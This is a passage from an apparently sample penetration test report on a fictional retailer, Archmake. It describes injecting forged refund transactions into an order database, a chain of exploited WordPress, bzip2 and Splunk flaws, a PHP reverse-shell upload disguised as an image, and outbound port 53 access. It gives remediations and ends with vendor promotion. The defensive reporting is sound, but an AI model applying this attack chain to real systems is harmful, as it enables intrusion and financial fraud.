The effect of this amounts to a serious compromise. The volume of personal information extracted from 
the database, combined with the common tendency for password re-use, could significantly impact the 
customers of Archmake had this been a real attack. 



For details of the exploited vulnerability, please see Appendix A. 
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Attacker Control of Archmake Transactions 

While conducting further examination of the database backend, we determined that a number of tables 
were being updated on a regular basis. By monitoring the activity of these tables, it was discovered that 
as orders were entered into the system, they would be placed into the tables. On a periodic basis, 
another process would take action based upon the "Category". 



CustJD 


CreditCard 


Category 


Amount 


448917 


4716428624251 690 


I 


326,450.06 


27362 S 


4916350995365090 


4 


544,382.49 


170117 


4532665952205720 


6 


339,151.73 


623596 


4532876975411010 


1 


319,276.63 



Through a combination of monitoring database activity, and placing orders through the standard 
system, it was possible to identify the purpose of a subset of Categories. 



1 


Standard order, Card charged 


2 


Unknown 


3 


Rush order, Card charged 


4 


Refund, Card refunded funds 


5 


Unknown 


6 


Internal order 



Once a mapping of transaction types was created, an attempt was made to manually inject data into this 
table. It was discovered that by injecting a valid CustID and an attacker owned credit card number with a 
category of 4 (Refund), an arbitrary amount of money could be refunded to the attackers. This was 
verified in cooperation with Archmake under controlled conditions. 

It is believed, but not tested, that new orders could be placed and shipped to attacker created customer 
entities. This was not verified due to the disruption it would cause to the Archmake workflow. 

By exerting control over the backend database system, it was possible to have control over the entirety 
of the Archmake order process. This is of extreme importance to Archmake, due to the amount of 
disruption it could cause to its business processes. Additionally, the ability of an attacker to obtain direct 
financial benefit from this attack makes Archmake an extremely attractive target. 

For details of the exploited vulnerability, please see Appendix A. 
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Conclusion 

In the course of the external penetration test, Archmake suffered a cascading series of breaches that led 
to conditions that would directly harm the company as well as its customers. 

The specific goals of the penetration test were stated as: 

o Identify if a remote attacker could penetrate Archmake's defenses, 
o Determine the impact of a security breach on: 

o The integrity of the company's order systems. 

o The confidentiality of the company's customer information. 

o The internal infrastructure and availability of Archmake's information systems. 

These goals of the penetration test were met. It was determined that a remote attacker would be able 
to penetrate Archmake's defenses. To make this situation even worse, the initial attack vector can be 
discovered via automated scanning, creating a situation where a remote attack could be initiated on a 
non-targeted basis. The impact of this penetration led to the complete control of Archmake's 
information systems by the attacker. 

Archmake's customer privacy was directly impacted through the attacker's ability to obtain a large 
amount of information about them, including clear text passwords, through the use of a brute force 
attack. This exposes the customers to direct attack, which could lead to financial impact. Customer trust 
in Archmake would be negatively impacted were such an event to occur. 

It was possible to obtain complete and total control over the company order process. This provided the 
attacker with the ability to steal funds from Archmake, making this attack both very damaging and very 
attractive. 

Recommendations 

Due to the impact to the overall organization as uncovered by this penetration test, appropriate 
resources should be allocated to ensure that remediation efforts are accomplished in a timely manner. 
While a comprehensive list of items that should be implemented is beyond the scope of this 
engagement, some high level items are important to mention. 

1. Implement and enforce implementation of change control across all systems: Misconfiguration 
and insecure deployment issues were discovered across the various systems. The vulnerabilities 
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that arose can be mitigated through the use of change control processes on all server systems. 

2. Implement regular firewall rule set reviews: Review the firewall rule set on a regular basis to 
ensure that all systems open to internal traffic continue to have a business reason to exist. We 
recommend that NIST SP 800-41 7 be consulted for guidelines on firewall configuration and 
testing. 

3. Implement a patch management program: Operating a consistent patch management program 
per the guidelines outlined in NIST SP 800-40 8 is an important component in maintaining good 
security posture. This will help to limit the attack surface that results from running unpatched 
internal services. 

4. Conduct regular vulnerability assessments: As part of an effective organizational risk 
management strategy, vulnerability assessments should be conducted on a regular basis. Doing 
so will allow the organization to determine if the installed security controls are installed 
properly, operating as intended, and producing the desired outcome. Consult NIST SP 800-30 9 
for guidelines on operating an effective risk management program. 

5. Restrict network access to server management interfaces: Proper network segmentation will 
reduce exposure to internal attacks against the server environment. Operating a well-designed 
DMZ will allow Archmake to conduct its e-commerce business in a manner that does not expose 
internal systems to attack. Consult FIPS 191 10 for guidelines on securing local area networks. 

6. Restrict access to critical systems: It is recommended that the database server be isolated from 
other systems. If possible, a whitelist of database commands should be implemented specifying 
the minimum number of commands required to support business operations. This is inline with 
the system design concept of least privilege, and will limit the amount of damage an attacker 
can inflict on corporate resources. Consult NIST SP 800-27 RevA 11 for guidelines on achieving a 
security baseline for IT systems. 

7. Apply industry methodologies for secure software design: The use of hard coded credentials 
within custom applications is highly discouraged. Users should have a need to know, and be 



7 http://csrc.nist.gov/publications/nistpubs/800-41-Revl/sp800-41-revl.pdf 

8 http://csrc.nist.gov/publications/nistpubs/800-40-Ver2/SP800-40v2.pdf 

9 http://csrc.nist.gOv/publications/PubsDrafts.html#SP-800-30-Rev.%201 

10 http://csrc.nist.gov/publications/fips/fipsl91/fipsl91.pdf 

11 http://csrc.nist.gov/publications/nistpubs/800-27A/SP800-27-RevA.pdf 
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required to provide, credentials before accessing confidential and proprietary data. This 
provides better security, and an audit trail that allows the business to tie actions to specific user 
accounts. 



For details on the specific exploited vulnerabilities, please see Appendix A. 



Risk Rating 

The overall risk posed to Archmake as a result of this penetration test is High. A non-targeted attacker 
has the potential to damage the company in a manner that would have direct operational and financial 
impact. 
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Appendix A: Vulnerability Detail and Mitigation 

Risk Rating Scale 

In accordance with NIST SP 800-30, discovered vulnerabilities are ranked based upon likelihood and 
impact to determine overall risk. 



Unprotected WP-Admin Access 



Rating: 

Affected System: 
Description: 



Impact: 



Remediation: 



High 

www.Archmake.com 

Access to the www.Archmake.com administrative interface is only protected by a 
username and password combination. It is suggested best practice to only allow 
specific hosts access to any administrative interface. 

If an attacker is able to obtain valid credentials or a valid session to the 
administrative interface, there are no additional controls in place to prevent 
privilege escalation. In the course of this penetration test, additional layers of 
defense at this layer would have mitigated the initially discovered foothold 
gained by the attackers. 

Implement controls to only allow connections to the administrative interface 
from known hosts. A potential method for achieving this could be through only 
allowing access from clients that are behind the company VPN or a whitelist of 
known trusted hosts. 



Vulnerable WordPress Search Plugin 



Rating: 

Affected System: 
Description: 



Public Exploit: 
Impact: 



High 

www.Archmake.com 

The www.Archmake.com system is operating with a vulnerable WordPress plugin 
(Relevanssi User Searches) that interacts with the public search function of the 
site. This vulnerability is exploited by storing javascript, which is then executed as 
a stored XSS vulnerability. 
http://www.exploit-db.com/exploits/16233/ 

This vulnerability can be utilized to obtain a valid session to the WordPress 
administration interface, providing the attacker with administrative access of the 
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Remediation: 



overall system. 

Update the Relevanssi plugin to a version greater than 2.7.2. 



Webserver Bzip Vulnerability 



Rating: 

Affected System: 
Description: 

Public Exploit: 

Impact: 

Remediation: 



High 

www.Archmake.com 

The version of bzip2 running on the remote system is vulnerable to a race 
condition, that when properly exploited results in arbitrary code execution. 
http://www.exploit-db.com/exploits/18147/ 

By utilizing a public exploit for this flaw, root level privileges can be obtained. 
Apply vendor-supplied patches to update bzip2 to a version greater than 1.0.5-6. 



Vulnerable Splunk Installation 



Rating: 

Affected System: 
Description: 

Public Exploit: 
Impact: 

Remediation: 



High 

10.10.0.3 

The version of Splunk on the remote host is vulnerable to remote command 
injection. 

http://www.exploit-db.com/exploits/18245/ 

An unauthenticated remote user with access to the Splunk host can execute 
commands as Local System user. 

Update the Splunk installation to version 4.2.5 or higher. 



Hardcoded Username and Password in Executable 



Rating: 

Affected System: 
Description: 

Impact: 



Remediation: 



High 

10.10.0.3 

The exportcsv.exe application on the remote host was found to be operating 
with database credentials hardcoded into the application. 

By extracting the credentials from the application, direct connections to the 
database server were possible. The credentials had administrative level access, 
which provides full control over the database contents. This has the effect of 
granting total control of the backend system to the attacker. 
Deploy interactive authentication as part of the application start-up process. 
Have unique username/password combinations for each entity that accesses the 
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system. Create a whitelist of the least number of required commands that are 
permitted for each account. 



Database Unsalted Password Storage 



Rating: 

Affected System: 

Description: 

Impact: 



J 12 



Remediation: 



High 

10.10.0.5 

Passwords stored on the database server were discovered to be unsalted 1 
By storing passwords without salting them, brute force attacks against the 
system were able to obtain the clear text values with minimal effort. In this 
instance, it provided the attackers with the clear text passwords of the vast 
majority of Archmake's customers, introducing them to the potential of future 
attacks. 

Make use of stronger encryption/hashes in the future. Ensure that all 
appropriate measures are taken to ensure the security of sensitive data at rest. 



Unprotected Database Server 



High 

10.10.0.5 

The database server was found to be operating on a flat network, which allowed 
connections from the local LAN. Due to the sensitivity of this system, additional 
controls should be put into place to ensure its protection. 

Once credentials to the database server were discovered, it was trivial to obtain 
full control over the system. This resulted in a much greater impact to the 
organization. 

Implement additional layers of defense for the database server. This may include 
moving the database server to a separate network and strictly controlling ingress 
and egress traffic to it. 

Database Contains Unencrypted Credit Card Numbers 

Rating: High 
Affected System: 10.10.0.5 



Rating: 

Affected System: 
Description: 



Impact: 



Remediation: 



http://en.wikipedia.org/wiki/Salt_(cryptography ) 
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Description: 



Impact: 



Remediation: 



It was discovered that in the course of transaction processing, credit card 
numbers are stored in clear text on the database server for a brief period of 
time. 

While the time that credit card numbers are in the database is short, it was 
enough of an exposure to allow the attackers to obtain them on a consistent 
basis. This compromised the integrity of all credit cards that are processed by the 
system. 

The design and architecture of the transaction processing system should be 
reviewed. This review will identify which additional controls should be put in 
place to better protect customer data. 



Lack of Transaction Verification 



Rating: 

Affected System: 
Description: 

Impact: 



Remediation: 



High 

10.10.0.5 

No verification was in place to validate the source of transactions submitted to 
the database for processing. 

By not validating the integrity of the submitted transactions, it was possible for 
the attackers to submit arbitrary transactions and have them processed by the 
system as if they were authentic. In the course of the penetration test, this 
vulnerability allowed refunds to be processed against attacker-supplied credit 
cards. 

Controls should be added to verify the integrity of transactions before 
processing. 



SSH Key Files not Password Protected 



Rating: 

Affected System: 
Description: 



Impact: 



Medium 

www.Archmake.com 

Once root privileges were obtained, it was possible to make use of the installed 
ssh key files as they were not password protected. It is considered best practice 
to protect ssh key files through the use of passwords. 

By utilizing the existing ssh key files and ssh tunnels, it was possible to remotely 
access the system without altering the root user's password. This minimized the 
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Remediation: 



chances of being detected. 

Use passwords to protect all ssh key files. 



Outbound Access from Webserver 



Rating: 

Affected System: 
Description: 



Impact: 



Remediation: 



Medium 

www.Archmake.com 

The www.Archmake.com system was discovered to allow outbound connections 
to specific ports. While some filtering is in place, outbound connections to TCP 
port 53 were discovered to be open. It is best practice to only allow traffic from 
externally initiated connections to valid server ports. 

The permitted outbound connections were used to establish interactive access 
to the impacted system. If this were not allowed, the attacker's abilities would 
have been impaired. 

Employ egress filtering in the DMZ to only allow servers to initiate connections to 
specific hosts on specific ports. 



WordPress Upload Plugin Invalid File Type Checks 



Rating: 

Affected System: 
Description: 

Impact: 



Remediation: 



Low 

www.Archmake.com 

The admin upload plugin has implemented file type checking in a manner that is 
ineffective. 

Impact of this issue is low due to the fact that only administrative users have 
access to this functionality. This flaw was utilized to ease transferring files to the 
impacted system. If this issue was corrected, alternative means for file transfer 
would have been utilized. 

Correct file type checking or disable the plugin if the functionality is not required. 
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Appendix B: List of Changes made to Archmake Systems 

The following files were altered or created as part of this penetration test. Specific details of how or why 
these files were altered is included in the Attack Narrative. 



www.Archmake.com: 



10.10.0.3: 
Windows domain: 



/root/.ssh/authorized_keys 

Files uploaded into /var/www/wp-content/uploads: 
o face.png 

o php-reverse-shell.png.php 

o race.png 
All files located in C:\Users\hacker\Downloads 
"hacker" user created 
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Appendix C: About Offensive Security 

Offensive Security advocates penetration testing for impact as opposed to penetration testing for 
coverage. Penetration testing for coverage has risen in popularity in recent years as a simplified method 
for companies to meet regulatory needs. As a form of vulnerability scanning, penetration testing for 
coverage includes selective verification of discovered issues through exploitation. This allows service 
providers to conduct the work largely through the use of automated toolsets and maintain consistency 
of product across multiple engagements. 

Penetration testing for impact is a form of attack simulation under controlled conditions. This more 
closely mimics the real world, targeted attack threat that organizations face on a day-to-day basis. 
Penetration testing for impact is goal-based assessments that identifies more than a simple vulnerability 
inventory, but instead provides the true business impact of a breach. An impact-based penetration test 
identifies areas for improvement that will result in the highest rate of return for the business. 

Penetration testing for impact poses the challenge of requiring a high skillset to successfully complete. 
As demonstrated in this sample report, Offensive Security believes that it is uniquely qualified to deliver 
world-class results when conducting penetration tests for impact due to the level of expertise found 
within our team of security professionals. Offensive security does not maintain a separate team for 
penetration testing and other activities that the company is engaged in. This means that the same 
individuals that are involved in Offensive Security's industry leading performance-based training, the 
production of industry standard tools such as BackTrack Linux, authors of best selling books, and 
maintainers of industry references such as Exploit-DB are the same individuals that are involved in the 
delivery of services. 

Offensive Security offers a product that cannot be matched in the current market. However, we may not 
be the right fit for every job. Offensive Security typically conducts consulting services with a low volume, 
high skill ratio to allow Offensive Security staff to more closely mimic real world situations. This also 
allows customers to have increased access to industry-recognized expertise all while keeping costs 
reasonable. As such, high volume, fast turn around engagements, are often not a good fit. Offensive 
Security is focused on conducting high quality, high impact assessments and is actively sought out by 
customers in need of services that cannot be delivered by other vendors. 

If you would like to discuss your penetration testing needs, please contact us at info(5)offsec.com . 
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